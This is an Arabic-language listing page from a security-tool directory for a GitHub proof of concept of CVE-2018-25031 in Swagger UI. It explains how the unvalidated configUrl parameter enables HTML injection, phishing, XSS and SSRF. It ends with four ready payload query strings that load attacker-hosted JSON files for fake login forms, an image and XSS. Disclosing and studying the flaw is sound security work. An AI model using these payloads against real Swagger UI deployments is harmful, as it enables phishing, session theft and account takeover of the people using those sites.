Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
أدوات/GitHubGitHub/relichunt3r/swagger-ui
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة: دور Swagger UI

Swagger UI هي مكتبة مستخدمة على نطاق واسع تقوم بعرض مواصفات OpenAPI (المعروفة سابقًا باسم Swagger) في واجهة ويب تفاعلية. تتيح للمطورين والمتكاملين استكشاف واختبار واجهات برمجة التطبيقات (APIs) دون الحاجة إلى وجود تطبيق خلفي.

تفاصيل CVE‑2018‑25031

السبب الجذري: تحميل المواصفات عن بُعد

ينشأ الثغرة من عدم كفاية التحقق من معاملات عنوان URL المستخدمة لتحميل ملفات التهيئة أو المواصفات عن بُعد بواسطة عميل Swagger UI. المعاملات الشائعة المتضمنة هي:

  • ?url=.yaml
  • ?configUrl=.json

يمكن للمهاجم توجيه هذه المعاملات إلى تعريف OpenAPI أو ملف تهيئة يتم التحكم به عن بُعد، والذي قد يتم عرضه بواسطة مثيل ضعيف.

ناقلات الهجوم المحتملة

يمكن أن يؤدي تحميل ملف ضار عن بُعد إلى تمكين العديد من النتائج عالية التأثير حسب تكوين الاستضافة والضمانات الموجودة:

  1. حقن HTML (HTMLi) / التصيد - يمكن أن تحتوي الملفات المحقونة على HTML عشوائي يقوم بتزييف المحتوى بصريًا (على سبيل المثال، نماذج تسجيل دخول مزيفة)، مستغلاً النطاق الموثوق به لمثيل مستضاف ذاتيًا.
  2. البرمجة النصية عبر المواقع (XSS) - إذا تضمن المحتوى المحقون JavaScript قابل للتنفيذ، فقد يؤدي ذلك إلى XSS في DOM ويسمح بسرقة الجلسات أو تنفيذ إجراءات نيابة عن المستخدمين.
  3. تزوير الطلب من جانب الخادم (SSRF) - عندما تجلب الخوادم المواصفات عن بُعد نيابة عن العميل، قد يجبر المهاجم الخادم على تقديم طلبات إلى نقاط نهاية داخلية، مما قد يكشف عن موارد حساسة.

المراجع:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

إثبات المفهوم (POC)

الحمولات

1 - تسجيل الدخول

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - تسجيل الدخول عن بُعد

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - صورة

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 إخلاء مسؤولية

المحتوى الموجود في هذا المستودع مقدم للأغراض التعليمية والإعلامية فقط. المؤلف غير مسؤول عن أي استخدام خاطئ. تأكد من حصولك على الإذن المناسب قبل الاستخدام، وتصرف بمسؤولية على مسؤوليتك الخاصة، واتبع جميع الإرشادات القانونية والأخلاقية.

تنزيل الأداة